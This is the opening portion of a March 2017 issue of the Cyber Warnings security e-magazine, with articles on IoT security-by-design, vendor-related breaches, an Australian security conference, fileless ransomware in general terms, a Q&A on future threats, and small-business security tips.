Cyber Warnings

; Cyber Warnings E-Magazine March 2017 Edition
1
Copyright Cyber Defense Magazine, All rights reserved worldwide
CONTENTS CYBER WARNINGS
Published monthly by Cyber Defense Magazine and
distributed electronically via opt-in Email, HTML, PDF and
Orchestration, Autonomous Self-Driving Cars and IoTOh my! .............. 3
Online Flipbook formats.
IoT Devices Require Security-First Design ................................................ 5
PRESIDENT
3rd Party and Vendors................................................................................ 8
Stevin Miliefsky
stevinv@cyberdefensemagazine.com
Wrap-Up: The Australian Cyber Security Centre 2017 Conference ........ 12
EDITOR
Fileless Ransomware: How It Works And Why It Matters ....................... 15
Pierluigi Paganini, CEH
The Future of Cyber Security ................................................................... 18 Pierluigi.paganini@cyberdefensemagazine.com
Improve Company Cyber Security While Staying on Budget .................. 23

ADVERTISING
The information sharing methods ............................................................. 26
Jessica Quinn
jessicaq@cyberdefensemagazine.com
Cybersecurity Regulations in 2017 .......................................................... 28
Password security: It's like sellotaping your house key to the front door... KEY WRITERS AND CONTRIBUTORS
.................................................................................................................. 31
Bill Graham
Charles Parker, II
14 Unique Ways to Protect Yourself from DDoS Attacks ........................ 34
Michael McKinnon
Patrick McDaniel
DNC, Clinton campaign hacks highlight need for journalists to move past Maricel Tabalba
content and focus on how easily it was stolen ......................................... 41 Milica D. Djekic
Jonathan Stock
THE GLOBAL CYBER SECURITY BATTLE ........................................... 44 Todd Reagor
Andrew Conte
Brian Nussbaum
A Look Into Cyber Security ....................................................................... 48 David J. OReilly
Matthew Stockham
How Does A Double Opt-In Help Keep Your Email Spam Free? ............ 55 Ciara Noonan
David Balaban
Franois Amigorena
How good is your backup? ....................................................................... 57 Tom Gilheany
Robert Mills
How to survive the cybersecurity expertise shortfall ................................ 61 Anas Baig
Lance Cottrell
How to save your critical data using smart backup procedures? ............ 64
Interested in writing for us:
writers@cyberdefensemagazine.com
Mirai Botnet ............................................................................................... 66
IT Security - Lost Cause? ......................................................................... 69 CONTACT US:
Top 5 Cyber Security Tips Every Internet User Must Consider ............... 75
Cyber Defense Magazine
Toll Free: +1-800-518-5248
Fax: +1-702-703-5505
Protecting Government by Expecting the Worst ...................................... 77 SKYPE: cyber.defense
Magazine: http://www.cyberdefensemagazine.com
CDM Job Listings .......................................Error! Bookmark not defined.
Copyright (C) 2017, Cyber Defense Magazine, a division of
STEVEN G. SAMUELS LLC
NSA Spying Concerns? Learn Counterveillance ..................................... 81 848 N. Rainbow Blvd. #4496, Las Vegas, NV 89107. EIN: 454-18-
8465, DUNS# 078358935.
Top Twenty INFOSEC Open Sources ..................................................... 84 All rights reserved worldwide. sales@cyberdefensemagazine.com
National Information Security Group Offers FREE Techtips .................... 85 Executive Producer:
Gary S. Miliefsky, CISSP
Job Opportunities ..................................................................................... 86
Free Monthly Cyber Warnings Via Email ................................................. 86
Cyber Warnings Newsflash for March 2017............................................. 89
2 Cyber Warnings E-Magazine March 2017 Edition

Orchestration, Autonomous Self-Driving Cars and IoTOh my!
Friends,
Security by design has not been a priority in most networking equipment and
computers as well as smart devices aka the Internet of Things (IoT). And
now they want us to trust self-driving cars? The more our team at CDM digs
into the vulnerabilities inherent in all this equipment, the more risk we see in
the industry.
Months ago, Dyn, a big dns service for Twitter, Spotify, Netflix and others
was hit with a huge distributed denial of service (DDos) attack. It caused a
USA east-coast partial internet outage as well as reduced access to these major content service
providers. When asked how this could happen, you have to dig into my opening paragraph above its
all about security by design. Its not actually Dyns fault its the fault of the vendors of wireless routers,
cable modems and other IoT devices that have been shipped with major vulnerabilities, allowing hackers
to infect these devices with remote botnet code. Once the botnet is triggered, hundreds of thousands up
to millions of infected and vulnerable devices become part of the attack network hitting Dyn with nearly
1 Gigabyte per second of traffic. It sounds unbelievable but its true and its that simple we have tons of
infected equipment because the hardware and software manufacturers have not built these systems with
security in the forefront in fact its no where in the design plans.
So move forward to the future, when self-driving cars have become the norm. If these manufacturers
dont start to put some InfoSec brainpower in the design meetings, expect remote control, denial of
service, remote access Trojans and botnets running in your cars. This means lives will be in jeopardy.
While some of these issues was discussed at the RSA conference (search
here: https://www.rsaconference.com/press/74/rsa-conference-2017-closes-with-record-attendance) it
seems that in 2017 we will see it become a central theme at Insurance conferences at IoT conferences
lets hope the vendors who make the equipment are actually listening the investment into security by
design, up front, will save them millions of dollars from the damages and legal fees they will pay if a
breach occurs, their equipment is compromised and heaven-forbid someone is harmed. Security must be
in the forefront of all that we do, given the world we live in, where hackers far away can attack equipment
over the internet without any care in the world.
Lets work together to discuss securing critical infrastructure, planes, trains and automobiles as well as all
these not so secure smart devices we begin to trust our lives with. Its time to get one step ahead of the
next threat, which is now targeting our very safety!
Lets continue to share a wealth of information with each other to stay one step ahead of the next threat!
To our faithful readers, Enjoy
Pierluigi Paganini
Pierluigi Paganini, Editor-in-Chief, Pierluigi.Paganini@cyberdefensemagazine.com

IoT Devices Require Security-First Design
by Bill Graham, Technical Marketing Specialist, GrammaTech
Introduction
The Stuxnet malware was a wake-up call for embedded device security when it became public
knowledge in 2010. Its sophistication and purpose made it clear that industrial control systems
and the embedded systems used to control and monitor critical infrastructure were at risk.
Machine to Machine (M2M) and Internet of Things (IoT) realities mean that more and more
devices are being deployed and connected to each other. This connectivity is both the promise
of IoT (data gathering, intelligent control, analytics, etc.) and its Achilles heel. With ubiquitous
connectivity comes security threats - the reason security has received such a high profile in
recent discussions of IoT.
Security-First Design
Security has not always been a primary concern for embedded devices -- connectivity was
assumed to be local, and in the hands of trusted operators and devices. Stuxnet, however,
quickly proved that even local access cant be trusted, as it infected PCs and laptops that then
infected programmable logic controllers (PLCs) that were connected via a local area network.
Modern devices need to be connected to a network (and frequently the Internet), and these
devices require more serious attention to security and applying security principles early in the
development lifecycle.
Software Security in the Software Development Lifecycle

A security-first design approach means integrating security as a top priority in the software
development lifecycle (SDLC). Developers and project managers can expect at least the
following types of activities at these key stages:
Figure 1: Security processes superimposed over the software design lifecycle.

Requirements stage: Once a system-wide threat assessment is available, the device
threat surface can be understood. At the requirements stage, security-specific
requirements can be introduced, along with known abuse cases (use cases that an
attacker might follow) and a risk analysis. Security requirements, as listed below, are
introduced and accounted for. This stage is critical because it is the point at which
security becomes a known development project goal with the appropriate level of risk
management, scheduling, and costing.
Design and architecture: As candidate architectures become available, reviews must

include security aspects (where previously, they may not have). Assessing architecture
in light of the known threat assessment and security requirements adds an additional
dimension to this phase of development. At this stage, testing plans should be created
that include security analyses that follow the perceived abuse cases.
Code development: At the coding stage, following security guidelines and coding
standards are critical. The use of automation tools such as static analysis is key to
ensure that vulnerabilities are not introduced into the product. Testing and test
automation that includes a security analysis are important at this stage.
Integration and test: As the system as a whole starts to take form, subsystem and
system testing will find vulnerabilities before integration and deployment to the market.
Automated penetration testing tools can be very helpful at this stage to uncover
vulnerabilities that may not have been accounted for in earlier stages of development.
Packaging and configuration of the end product for deployment is key at the final stages.
Ensuring that the out-of-the-box product is as secure as possible prevents many of the
security issues we see today in connected devices.
Deployment and maintenance: When a product enters the market and starts wide
deployment, security vulnerabilities become exponentially more costly to fix. A product
designed with a security-first approach is less likely to end up with a security breach, but
companies must be prepared to deal with security on an ongoing basis. Designing the
product with the ability to update firmware and software is critical to addressing new-
found issues expeditiously. However, as a product goes through maintenance and
revision, security is an ongoing concern, and new vulnerabilities and threats need to be
fed back into the system in an iterative approach.
Security Requirements
Securing an embedded device requires many considerations. Key examples of security
requirements that might go above and beyond existing functional requirements are as follows:
User authentication validating user access and enforced privileges for different
classes of users.

Tamper resistance preventing physical and software changes to the device that allow
circumvention of security functions.
Secure storage ensuring stored data is protected from online and offline access,
including techniques such as encrypted file storage and Digital Rights Management
(DRM).
Secure communications keeping data-transfer secure but also preventing unwanted

access through connected channels (network, USB, etc.). Although network connectivity
is top of mind, other channels are vulnerable to attack.
Reliability and availability - maintaining safe operation of the device in the face of
ongoing attacks.
The Role of SAST tools in a security-first approach

Static Application Security Testing (SAST) tools provide critical support in the coding and
integration phases of development. Ensuring continuous code quality, both in the development
and maintenance phases, greatly reduces the costs and risks of security and quality issues in
software. In particular, it provides some of the following benefits:
Continuous source code quality and security assurance

Tainted data detection and analysis
Third-party code assessment
Secure coding standard enforcement
Conclusion
In IoT and M2M systems, security must be designed-in and not added on in order to avoid
significant business risk and cost. A careful approach that includes understanding the attack
surface of the device and using automated analyses can greatly reduce this risk. Tools have an
important role to play and can help device developers build in quality, security, and safety.
About The Author

Bill Graham is a seasoned embedded software development manager with
years of development, technical product marketing and product
management experience.
Bill can be reached online at bgraham@grammatech.com

3rd Party and Vendors
Lack of Focus on InfoSec
by Charles Parker, II; InfoSec Architect
No business is an island. At times, they require outside services from vendors to complete their
mission. An organization, as a rule of thumb, is not able to have every employee available that
is a subject matter expert (SME) on everything that affects a business.
The networks and systems are simply too complex with too many parts moving in tandem to
have a labor force of experts. It is just not a viable endeavor. To secure third parties who have
their expertise in these areas tend to be much more cost effective.
Although this is a positive aspect and assists the business in improving their income statement,
this also has the potential for a significant issue. When the vendors plug into the clients
network, any malware or issues on their system have the opportunity to cross onto the clients
with the connection.
If the vendors laptop was connected to local coffee shops free and open Wi Fi, a thumb drive
that was used at the employees high school is plugged later into the laptop, or if this was
connected to the airports free and open Wi Fi, any malware encountered, including
ransomware, would be available for the clients system.
In the Navy
The armed forces are no different than a business in that these both have the technical needs
and potential to not have the depth or breadth of staff to accomplish everything they need.
In this specific instance, the Navy contracted with Hewlett Packard Enterprises (HPE) for a
project or function. HPE had their contractors working with the Navy and their data.
Seemingly this would be an acceptable relationship. In this recent case, the contractual
relationship did not work as well. HEP notified the Navy on October 27, 2016 one of their
laptops had been compromised.
Affected
The Navy has a vast number of members all working across the planet at any particular time. In
this case, 134,386 current and former Navy personnel had their SSN and names compromised.
This data was part of the Career Waypoints (C-WAY) database, which is used by sailors for
career planning functions.

This set of compromised data was due to data on the third partys laptop being compromised.
Whether the laptop was stolen or lost, or hacked was not reported. With any method, the data
was not secured.
Follow-Up
With most breaches and compromises, there tends to be a lesson to be learned and applied to
other circumstances and business. Although each incident is different, there are still the same
issues encountered and seen repeatedly.
Although these seemingly re-appear frequently, there are still the lessons to apply with the new
environments.
There are many actions to be taken to harden your system from the application to the hardware.
These are applied based on the requirements and needs of the business and users.
There is a balancing act between the confidentiality, integrity, and accessibility (CIA). One
aspect though that continues to plague business that is not still addressed are the risks from the
third parties.
Granted the third parties are separate entities standing along, with unique ownership. With
certain third parties and projects, they require access to the clients network, system, and
nodes.
If the third party does not have an adequate cyber/InfoSec program to ensure as much as
possible their systems are without malware, each and every time the third party vendors
representative connects to the system there is the distinct opportunity for malware to cross onto
the clients enterprise.
The client may attempt to push the liability for any breach or compromise to the vendors,
however this act may not be that easily accomplished.
There are opportunities to defend against this. One step used is to require vendors and
contractors to complete a cyber/InfoSec questionnaire.
Although this is a questionnaire, it provides insight into their practices that may have been
previously unknown. It also provides the opportunity to ask follow-up questions and possibly ask
for their latest pen test or vulnerability assessment.
With this data in hand, it would be possible to gauge better their focus, or lack thereof, on
security, which may act as guidance for the client when working through the contracts.

Like Attacks
This attack is not an anomaly. The security for the suppliers or vendors connecting to the
clients network continues to be a problem.
Although this is known, the testing of this vulnerability is lightly applied. Prior incidences include
but are not limited to:
a. Target in 2013: An air conditioning supplier had been phished.
b. PA Consulting in 2008: Lost the data for 84,000 prisoners, which were placed on an
unencrypted thumb drive.
c. Goodwill Industries from February 2013 to August 2014: Malware on a third party
suppliers system stole credit card and debit card ata from 330 stores in 19 states in the
US.
d. Home Depot in 2014: Suppliers username and password had been compromised,
leading to the credit card detail theft.
e. Wendys in 2016: Compromised third party credentials allowed malware to be introduced
into their enterprise which was coded to steal their clients credit card details in 20% of
the US stores.
f. Lockheed Martin in 2011: Data stolen from RSA was utilized to attack Lockheed Martin.
Long-Term Effects
This will have a long-term effect on the sailors whose information has been compromised. The
Navy has stated these affected personnel will be taken care of. This would, at this point, would
take the form of client monitoring services. The sailors were also told they should monitor their
bank accounts, credit card accounts, and watch for phishing attempts. The credit monitoring
services would be also offered. There had been no evidence of misuse of the data.
Bearing this in mind, the Navy and many others have missed the long-term implications of this.
The SSN for the sailors will not change over time. This is permanent. There is no shelf life for
the data to be sold. The data may be sold in one or three years, and sold two or three times.
The sailors would need to monitor their personal credit for years.
About The Author

Charles Parker, II began coding in the 1980s. Presently CP is an
Information Security Architect at a Tier One supplier to the automobile
industry. CP is presently completing the PhD (Information Assurance and
Security) with completing the dissertation. CPs interests include
cryptography, SCADA, and securing communication channels.
He has presented at regional InfoSec conferences. Charles Parker, II can be

reached online at charlesparkerii@gmail.com and InfoSecPirate (Twitter).

Wrap-Up: The Australian Cyber Security Centre 2017
Conference
How were getting serious about cyber security down-under.
By Michael McKinnon, Director - Commercial Services, Sense of Security
Were getting serious about cybersecurity thats the take away message from the Australian
Cyber Security Centre (ACSC) 2017 Conference that I
recently attended, 14 16 March 2017.
Held in Australias capital city Canberra for the last three

years, the annual ACSC conference has quickly
cemented itself as one of the premier cyber security
events in the region.
The conference is coordinated by the ACSC which is a

group of Australian Government departments aligned to
provide a cohesive response to the cyber security needs
of the country, and to act as a collaboration hub.
Accordingly, this conference provides a strong focus on

cyber security in the context of protecting national
interests, but also connects researchers, vendors,
consultants and government agencies together.
The conference opened with a keynote from Dr.

Deborah Frincke, head of the Research Directorate of
the US National Security Agency/Central Security
Service (NSA/CSS).
Dr. Frincke covered the rather fascinating concept of

adversarial machine learning describing a future
whereby attackers may be able to compromise highly-
automated and self-healing networks subverting them
by using tactics of misdirection with large volumes of
data for example.
As automation, deep-learning and other AI related technologies continue to mature and

become mainstream, it is not inconceivable to think that maybe were creating another set of
problems that well all be mitigating one day; reminiscent of the Internet of Things, which itself is
still unfolding.

Other popular themes at the conference included the threat updates and security intelligence
briefings with revelations about the latest cyber-criminal activities such as crimeware, and the
extraordinary effectiveness of ransomware-as-a-service.
Momentum from Australias Cyber Security Strategy

Along with international guests bringing knowledge from around the globe, many of the
speakers were from local Australian organizations reinforcing initiatives that were introduced in
Australias Cyber Security Strategy first announced in 2016.Like other countries around the
world, Australias cyber strategy aims to foster better relationships between the private and
public sectors for the betterment of national sovereignty, and encourages building a cyber
capability to protect and underpin future economic prosperity.
Mr. Craig Davies, CEO of the newly formed Australian Cyber Security Growth Network
(ACSGN) spoke at the conference about the upcoming tasks that his rapidly expanding team
will be delivering across the nation. The ACSGN is an industry-led not-for-profit company
created directly because of Australias cyber strategy.
The ACSGN is a unique example of how

governments can truly support the cyber
industry, and according to Davies, Were the
first organization, and we think were probably
the only organization, in the world chartered
by government to create an industry. As
such his group aims to lead the industry
collaboration, accelerate commercialization of
cybersecurity firms, address the cyber-skills
shortage, and pursue policy reforms.
Meet Australias Cyber Roo

We do love our wildlife in Australia, and I had the privilege of interviewing Cyber Roo arguably
one of Australias cutest and most inflatable cyber security ambassadors!
This globe hopping Kangaroo recently made it all the way to San Francisco as part of an
Australian Trade Cyber Mission that highlighted and promoted the capabilities of leading
Australian cyber security firms, including Sense of Security. The Boxing Kangaroo is a national
symbol of Australia and dates back to at least 1891. I like to think the Kangaroos natural
defense stance, which represents that of a boxer, is ideal for the metaphor of cyber defense in
its most natural and powerful form!
Australias #CensusFail Investigation Deepens

At the conference, the Australian Federal Police (AFP) also revealed they were closing in on the
perpetrators of a Distributed Denial of Service (DDoS) attack that formed part of what has since
been called Australias #CensusFail; relating to an incident that occurred on 9 August 2016.
Every five years the Australian Bureau of Statistics conducts a population census consisting of
a detailed survey of all Australian citizens with data collected then used by the government to

accurately identify growth areas to plan services, such as new hospitals and schools for
example. Traditionally delivered in paper-form to households across the country, in recent years
the eCensus has appeared, and last year it was heavily promoted as being the preferred way
for all citizens to participate. As you might imagine, its a privacy nightmare in terms of public
perception.
To make matters worse, on the evening of 9 August 2016 (Census Night) when many
Australian citizens sat in front of their computers to complete the somewhat lengthy survey
online, they were confronted with a website that simply didnt work the apparent cause: a
massive (and somewhat predictable) DDoS attack. Pandemonium ensued and a media frenzy
erupted with the Australian Prime Minister promising a full investigation.
By October (just two months after the incident) Australias newly appointed Special Adviser to
the Prime Minister on Cyber Security, Mr. Alastair MacGibbon (also attending the ACSC 2017
conference), released a review of the events surrounding the 2016 eCensus. Among a long list
of compounding errors, it was identified that the DDoS protections for the eCensus were
inadequate.
During the conference, AFPs manager of cybercrime operations, Mr. David McLean said they
were getting closer to who was behind the eCensus DDoS attacks stating there were some
very recent interesting developments deep within that. Meanwhile as you might expect, the
rest of us are eagerly awaiting the final results, to be released when the investigation concludes.
The importance of diversity in Cyber Security

One of the pleasing themes now popular at many cyber security events, and certainly visible at
ACSC 2017, was the strong support for having more women attendees. In fact, the organizers
arranged a dedicated Women Practitioner Networking Event on the end of the first day.
By all accounts it was a great success, and I look forward to a day when the current cyber
industry gender imbalance starts paying dividends with the addition of more brilliant minds to
what continues to be a challenging and demanding industry for us all.
About The Author

Michael McKinnon, Director Commercial Services
Sense of Security (https://www.senseofsecurity.com.au)/
Michael McKinnon is a cyber security expert at Sense of Security a

leading Australian cyber security consulting practice. With a core focus on
achieving tangible cyber resilience for business and government, Michael is
a trusted advisor to some of Australias best known brands and
organizations. He is a frequent media spokesperson and has been a member of the steering
group committee for the Australian Governments Stay Smart Online initiative.
Michael can be reached online via email at michaelm@senseofsecurity.com.au and invites

questions at any time on Twitter to @bigmac.

Fileless Ransomware: How It Works And Why It Matters
Ransomware is a problem for organizations: In the first three months of 2016, law
enforcement officials estimate that cybercriminals extorted almost $210 million from
businesses and institutions.
To combat this growing threat, IT teams and InfoSec tools have developed better ways
to detect malware-carrying email attachments and blacklist specific processes that
could lead to file encryption and ransom demands.
Yet hackers havent stayed idle now, a new type of attack, known as fileless
ransomware, is upping the ante and causing problems for IT. Heres how it works and
why it matters to your organization.
Forget Files
Ransomware is continually evolving. Early methods simply restricted access to user

devices rather than encrypting data; newer iterations leverage complex file encryption
techniques to individually compromise user files and folders on desktops, laptops or
mobile devices, and then demand payment in digital currency.
As security protocols such as signature-based detection, sandboxing and machine-

based learning have reduced the efficacy of this technique, however, threat actors
developed a new method: Fileless malware.
Fileless attacks take one of two forms: Phishing emails with attachments, which then
execute macros to start a command line; or compromised websites that exploit
vulnerable apps to do the same. Both methods then run a PowerShell script straight into
memory, which in turn downloads new scripts to encrypt user data and demand a
ransom. The problem for current detection methods? Nothing is written to disk, so these
attacks fly under the radar.
The New Vector
Fileless ransomware relies on the everyday habits of employees, such as opening email
attachments and using web browsers, to bypass threat detection methods and empower
complex encryption. Staying safe means thinking outside the typical threat response
model to leverage early indicators of attack (IOAs) code execution, lateral movement
or attempts to obfuscate action and then block programs based on this criteria.

The Future of Cyber Security
A Q&A with Patrick McDaniel
by The Association for Computing Machinery (ACM) and Patrick McDaniel, Distinguished
Professor of Electrical Engineering and Computer Science at Pennsylvania State University; ACM
Fellow
What do you see as the top cybersecurity threats in 2017 and why?
Theres been an interesting transition of threats and attacks over the last 10 years, and what
were seeing more frequently is professional attacks that more effectively monetize the
vulnerabilities in computers. In particular weve seen the rise in things like ransomware, which
has become a very serious problem for businesses, government agencies, and organizations
that dont have full-time professional cybersecurity staff.
Unfortunately, I think that trend is going to continue, and I also think we will see an increase in
attacks from organized crime syndicates and other state-sponsored types of attacks; in
particular attacks that use misinformation either for monetary or political gain.
Just looking at whats happened over the last six months in the United States, its clear that
misinformation has become a major weapon in the cybercriminals arsenal. I think we will see
even more attacks where misinformation is used to try and shape public policy, sway public
opinion or even to alter peoples behaviors. Obviously, the use of misinformation is nothing new-
-weve seen it before with stock market manipulation, etc.--but were going to see much newer
and inventive uses of misinformation as a means of enabling cyberattacks.
What is the biggest cybersecurity concern that keeps you up at night that isnt being
talked about?
Thats an interesting question, because I do believe that in the security community and as a
society at large, weve become too fixated on small-scale attacks,like phishing and ransomware,
that are the newsmakers. We see impersonation and point-of-sale attacks like the one against
Target. Of course, these are all important, and we need to spend time thinking about them,
understanding them and coming up with countermeasures. But in our fixation with these flashier
attacks, weve lost sight of something that was actually on a lot of peoples minds six or seven
years ago, and has potentially far more devastating results: an attack (or attacks) against
societal-scale critical infrastructure.
One of the most talked-about examples is a scenario where hackers gain access to the
electrical grid to cause havoc through widespread outages, etc. That example is very important,
but there are a lot of other critical infrastructures in our society that need to be addressed,
including things like healthcare and insurance systems. Imagine if the bad guys (whether
organized crime, hackivists, or nation states) were able to hack into one or two of the major
healthcare providers in the US and were able to generate a stream of false billing information, or
alter electronic medical records. It would have immediate, sometimes life-threatening, wide-
scale effects. If the adversary were able to get into the information systems on which the
insurance systems that drive the healthcare industry work, that could have major impacts on the
quality of healthcare of our society and could certainly lead to death, but thats something that
we as a society dont really hear about, because it hasnt happened yet.
Thats just one example. Certainly people talk about financial systems as being a target of
cyberattacks, but there are many others we dont immediately think about, things like shipping
and rail systems. Those critical transportation networks move the vast majority of food and
goods in this country. In fact, generally speaking, there are not even enough trucks to keep
everybody in the US fed. What if attackers were able to completely subvert the information
systems that run the rail systems in the country? What would be the impact? Would it lead to
food shortages? Possibly, but what would be the cascading effects of such a disruption?
Perhaps we could provide food, but our ability to deliver non-essential goods would drop off
significantly-- that would have a tremendous impact on our economy. So while its important to
spend time and resources protecting against the threat-of-the-day type attacks, we ignore these
large societal-scale infrastructure attacks at our own risk.
With the public more concerned about cybersecurity policy than ever before, what
should the top cybersecurity priorities be for the new US administration during its first
100 days in office?
Last year, President Obama launched the Cybersecurity National Action Plan (CNAP) which laid
out perhaps the most cogent plan for how the nation should address cybersecurity. Among the
first steps was fixing federal systems. Our federal IT systems, as weve learned repeatedly, are
very much antiquated, due to things like underfunding. But if our society is to become more
secure, we need to focus on updating and fixing those systems. One way would be for the
current administration to immediately prioritize creating a national two-factor authentication
system, either for federal employees or more broadly. Although that sounds somewhat boring,
I think that is the single simplest thing we can do to reduce the threats to our information
systems. Its achievable, using technology as it exists today. A good friend and colleague of
mine, Farnam Jahanian, the Provost of Carnegie Mellon University, has said that we are not
good at doing the easy things, and we need to get better at them. Building a national-scale two-
factor authentication system would certainly come with expenses, but it is a relatively simple
and effective way to discourage and prevent multiple forms of cyberattack. Its not universally
popular, but it would be easy, and its the easy stuff weve got to get better at.
This brings up another concern: what, as a nation, do we do about cybersecurity? There is a

misperception in some portions of the political arena that the current problems with
cybersecurity are due to a failure of engineering, but thats not really the case. The existence of
security problems isnt because the technology isnt necessarily good enough, its that we
havent made it a priority, and now its gotten out of hand. Although it may be a bit clich, I think

one of the major things President Trump could do to remedy cybersecurity issues would be to
approach it the same way the US approached the space race. We need to make cybersecurity a
national priority, not only to have better operational security but to go after the fundamental
science of cybersecurity. Cybersecurity should be a cornerstone of our scientific agenda, very
much the same way space travel was in the 50s and 60s. We put a tremendous amount of
energy and thought into addressing how we dealt with the space race, and I believe a similar
thing needs to be done with cybersecurity. Industry is not going to fix the problem alone. We
need a new science and new kind of engineering that will lead us to a more pervasive
cybersecurity and in turn a more secure society.
Should governments have authority to request keys/backdoors to all types of

cryptography?
Unfortunately, handing over the cryptographic keys that protect systems is only going to create
more problems. The idea that the secrets that control your most secure systems can be safely
handled by an organization as large as the federal government is just unrealistic. Quite frankly,
the history of security has shown this to be the case. By sharing all those keys with an
organization like the government, and giving them the ability to use those keys broadly, you
actually make society less secure, not more.
But this does bring up an interesting debate, and that is the tradeoff of where the right to
privacy interferes with the right to public safety. That is absolutely a public debate that needs to
be had. I dont think that any one person has a simple answer to that question, but thats the
question we need to be asking before we get to any particular implementation of a broader
consensus on what our public policy should be. There are technologies that will allow us to have
our cake and eat it too :here are ways to provide data, retain data, and compute with data that
will preserve our right to privacy but also preserve some rights to access for third parties. Those
technologies are very much in the forefront of peoples minds, but that is something that today
isnt quite there yet. Its unclear what the requirements for such a technology would be and
where to draw that line in the sand.
What are your biggest security concerns as they relate to the influx of connected devices
in the Internet of Things (IoT)?
When it comes to IoT and the future of security, I have a vision of two possible futureswe will
either be working toward and arrive at a sense of security where we have systems that provide
security for whatever weve defined that to be, and we have the technologies to make ourselves
secure, or we accept insecurity as the norm.
The first scenario comes at a significant cost. Just like we want more energy-efficient batteries,
it takes time and money to develop and manufacture them. If we want to be more secure, well
have to pay for more security. Theres no getting around it. But I believe this to be the more
optimistic future, because we will understand the tradeoff between cost and value, and were
going to pay for it so we can live in a world in which we have much better security than we do

today. It may not be perfect, but we will at least have some expectation of cost (financial and
functional) and the security we are achieving in that system.
The second and more pessimistic scenario is a world in which we have just become used to
insecurity. There is a kind of really toxic resignation among some members of the cybersecurity
research community, as well as industry and government, that todays systems are unfixable
and that we dont have the technology, time or resources to make ourselves more secure. The
danger with this resignation is that we are basically saying were okay to accept whatever
comes, at whatever cost to our society. Unless we make cybersecurity a national and industrial
priority, we might find ourselves in that world. This is a particularly dim and uncomfortable
scenario, not only because the kinds of benefits we see from technology would be greatly
diminished, but our potential for changing life on this planet-- from healthcare, to society, to
communications, to quality of life, to energy efficiency, to protecting the environment--will be
vastly diminished.
Finally, theres the issue of privacy. I tend to separate the issues of security and privacy,
although you can make parallel arguments. The problem today, especially with the social media
generation, is that we give up our privacy because there is no immediate cost. And because
there is no immediate cost, it becomes hard to quantify and understand, and even hard to
predict the potential outcomes.
Unfortunately, until you feel the pain of a privacy loss, it has a zero cost. Im consistently
surprised by the kinds of privacy tradeoffs people are making online. They dont really seem to
realize what they are giving up, and until we get to a point where public policy and technology
can help us see and understand the immediate costs of giving up our privacy, we will continue
to undermine ourselves.
About The Author
I am a Distinguished Professor in the School of Electrical Engineering and

Computer Science at Pennsylvania State University and a fellow of both IEEE
and ACM. I am also the Director of the Institute for Networking and Security
Research (INSR), a research institute focused on the study of networking and
security in diverse computing environments.
This Q&A was conducted by the Association for Computing Machinery

(ACM). For more than 50 years, the ACM Turing Award has been recognized
as the most prestigious technical award in the computing industry. In recognition of that
milestone, ACM has conducted Q&As with industry thought leaders to highlight important trends
and topics in the computing industry. More information on the ACM Turing Award may be found
at www.acm.org/turing-award-50

Improve Company Cyber Security While Staying on Budget
Cyber security is a critical issue for any business owner, and modern businesses face an ever-
evolving threat when it comes to keeping themselves and their customers protected. In fact,
studies project that cybercrime could cost businesses a staggering two trillion dollars by the
year 2019. It's become a digital epidemic, and businesses that aren't properly prepared leave
themselves open to dire consequences. Fortunately, you don't need the million-dollar budget of
an international corporation in order to stay protected. Implementing the common-sense tips
below will go a long way toward boosting your business' cyber security no matter your budget.
Stay Ahead of the Threat
The digital space is constantly growing and evolving, and so too are the risks to your business.
For that reason, effective cyber security protection requires sustained watchfulness and effort.
To keep your data protected, you need to stay ahead of the situation by always striving to
identify new threats, seek out both digital and physical vulnerabilities in your security systems
and be aware of the various motivations a hacker might have for targeting your business.
Studies have indicated that it takes an average of four months for companies to identify and fix
security vulnerabilities, which is simply far too long. Keep your company ahead of the curve
through constant vigilance.
Budget Wisely
Quality cyber security can be an expensive proposition, and many small businesses are
tempted to make cuts to their budget in order to save costs. Don't let your company be one of
them. While reducing your security budget may result in a short-term gain, it could put your
business and its customers at tremendous risk. Instead, review your budget and seek ways to
use the money more efficiently rather than cutting it entirely. Another financial consideration is
choosing the right business credit card. Business credit cards are popular targets for criminals,
so be sure to look for cards that offer advanced fraud protection features.
Implement Security Protocols
The greatest vulnerability in your cyber security system likely has nothing to do with your
hardware or software - it's the people who use them. In order to ensure the highest level of
protection, make sure that you've developed and implemented a policy of cyber security best
practices.
By training your employees in security best practices, you'll give them the tools they need to
identify potential threats and respond to them appropriately. Also keep in mind that this needs to
be an ongoing effort, with periodic refreshers to help employees stay up to date on the latest
threats and security measures.

Use the Cloud
Cloud storage is an excellent way to keep your company's data safe and secure, and it can also
simplify storage and sharing for your employees. If you're considering a move to the cloud,
however, it's critical that you choose an appropriate platform. Use a solution intended
specifically for businesses and ensure that they offer standard features like firewalls, multifactor
authentication and data encryption services. Don't be afraid to ask questions about where and
how your data will be stored, who will have access to it and whether the provider conducts
routine security audits. Your data is extremely valuable, so it pays to do your due diligence to
make sure you identify the best cloud provider for your needs.
Keep Your Software Updated
From antivirus software to cloud storage apps and web browsers, it's critical that any software
your business uses is kept up to date. Security exploits are being constantly identified and
patched, but you won't be able to take advantage of these protections if your software isn't
routinely updated to the newest stable versions. Automatic updates are useful but may not work
quickly enough, so incorporate routine update checks into your security protocols. If support for
any of your software is ever discontinued, consider switching to an alternative as quickly as you
can. Remember that, when it comes to digital security, time is rarely on your side.
Use the Tools at Your Disposal
If you're working under a tight cyber security budget, one way to improve your security is by
making use of all the tools at your disposal. In particular, SSL optimization tools can help you
manage your security more effectively without straining your budget or overtaxing yourself. A
certificate checker can automatically detect all of the SSL certificates that are active on your
network, reviewing them and providing useful reports on their health and status. Similarly, a
certificate monitoring tool can allow you or your admin to detect any suspicious activity and
prevent unauthorized SSL issuance. Best of all, these tools can often be found for free and are
quick and easy to use.
Cybercrime has become one of the primary threats facing today's businesses, and your
company is not immune no matter its size. The threat is constantly evolving, and addressing the
problem requires vigilance and active engagement. To keep your business and its customers
safe without overextending your security budget, ensure that you've implemented the simple,
affordable steps above.
About the Author
Maricel Tabalba is a freelance contributor for Credit.com who is interested in writing about
personal finance advice for Millennials and college students. She earned her Bachelor of Arts in
English with a minor in Communication from the University of Illinois at Chicago.

The information sharing methods
By Milica D. Djekic
The information could be shared through many different means and right here we would discuss
how they can leak out from some organization using insiders threat sources. The insiders
threats are those people within your business who are willing to release the confidential
information to some criminal or terrorist network being present outside.
They may spy on the rest of the enterprise or even steal some valuable objects from there and
take them out to their contacts. Through this article, we would analyze which methods of
information sharing are most typical to a modern business environment.
Right here we would mention how information could be stolen from some organization. Its
important to know that in case of cyberspace operation there could be used a plenty of social
engineering tactics. So, the methods are as follows:
The e-mail correspondence: Many confidential information could get stolen and
forwarded to an external threat using the email accounts. This method could get
